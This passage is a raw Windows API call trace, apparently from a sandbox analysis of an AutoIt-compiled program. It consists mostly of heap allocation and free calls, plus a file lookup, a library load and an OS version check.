RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0257.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0257.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0257.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0257.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0257.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0257.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0257.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0257.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0257.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0257.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0257.769] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0257.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0257.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0257.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0257.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0257.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0257.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0257.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0257.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0257.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0257.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0257.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0257.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0257.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0257.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0257.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0257.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0257.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0257.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0257.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0257.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0257.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0257.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0257.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0257.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0257.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0257.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0257.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0257.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0257.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0257.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0257.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0257.770] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0257.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0257.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0257.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0257.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0257.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0257.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0257.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0257.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0257.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0257.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0257.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0257.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0257.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0257.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0257.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0257.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0257.771] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0257.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0257.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0257.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0257.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0257.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0257.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0257.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0257.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0257.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0257.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0257.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0257.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0257.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0257.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0257.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0257.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0257.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0257.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0257.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0257.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0257.771] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/desktop.ini", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43f94523, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43f94523, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="desktop.ini", cAlternateFileName="")) returned 0xa872d0 [0257.772] FindClose (in: hFindFile=0xa872d0 | out: hFindFile=0xa872d0) returned 1 [0257.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0257.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0257.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0257.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0257.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0257.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0257.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0257.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0257.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0257.772] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0257.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0257.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0257.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0257.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0257.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0257.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0257.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0257.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0257.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0257.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0257.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0257.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0257.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0257.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0257.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0257.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0257.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0257.773] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0257.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0257.773] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0257.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0257.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0257.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ff8 [0257.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0257.773] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0257.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e68 [0257.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0257.773] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0257.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e68 | out: hHeap=0x970000) returned 1 [0257.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0257.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0257.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0257.773] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0257.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0257.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0257.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0257.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0257.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0257.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0257.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0257.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0257.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0257.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0257.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0257.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0257.774] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0257.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0257.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0257.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0257.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0257.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0257.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0257.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0257.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0257.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0257.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0257.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0257.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0257.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0257.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0257.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0257.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0257.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0257.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0257.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0257.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0257.775] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0257.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0257.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0257.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0257.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0257.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0257.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0257.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0257.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0257.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0257.775] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0257.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0257.775] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f10 [0257.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0257.775] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0257.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0257.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0257.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0257.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0257.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0257.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0257.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0257.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0257.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0257.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0257.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0257.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0257.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0257.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0257.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0257.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0257.776] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0257.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0257.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0257.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0257.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0257.776] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0257.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0257.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0257.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0257.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0257.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0257.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0257.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0257.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0257.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0257.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0257.776] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0257.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0257.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0257.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0257.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0257.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0257.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0257.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0257.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0257.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0257.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0257.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0257.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0257.777] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0257.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0257.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0257.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0257.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0257.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0257.777] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0257.778] HeapFree (in: 